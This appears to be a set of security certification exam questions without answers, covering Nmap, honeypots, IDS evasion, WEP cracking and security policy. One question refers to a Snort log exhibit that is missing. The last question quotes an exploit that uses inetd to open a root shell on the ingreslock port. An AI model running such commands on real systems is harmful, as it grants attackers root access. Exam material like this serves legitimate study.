Which command line switch would be used in NMAP to perform operating system detection?

Exhibit:
Given the following extract from the snort log on a honeypot, what service is being exploited? :

Bluetooth uses which digital modulation technique to exchange information between paired
devices?

There are two types of honeypots- high and low interaction. Which of these describes a low
interaction honeypot? Select the best answers.

A security consultant decides to use multiple layers of anti-virus defense, such as end user
desktop anti-virus and E-mail gateway. This approach can be used to mitigate which kind of
attack?

An Evil Cracker is attempting to penetrate your private network security. To do this, he must not be
seen by your IDS, as it may take action to stop him. What tool might he use to bypass the IDS?

Select the best answer.

A security policy will be more accepted by employees if it is consistent and has the support of

What is the advantage in encrypting the communication between the agent and the monitor in an
Intrusion Detection System?

There is a WEP encrypted wireless access point (AP) with no clients connected. In order to crack
the WEP key, a fake authentication needs to be performed. What information is needed when
performing fake authentication to an AP? (Choose two.)

Study the following exploit code taken from a Linux machine and answer the questions below:
echo “ingreslock stream tcp nowait root /bin/sh sh –I” > /tmp/x;
/usr/sbin/inetd –s /tmp/x;
sleep 10;

/bin/ rm –f /tmp/x AAAA…AAA
In the above exploit code, the command “/bin/sh sh –I” is given.
What is the purpose, and why is ‘sh’ shown twice?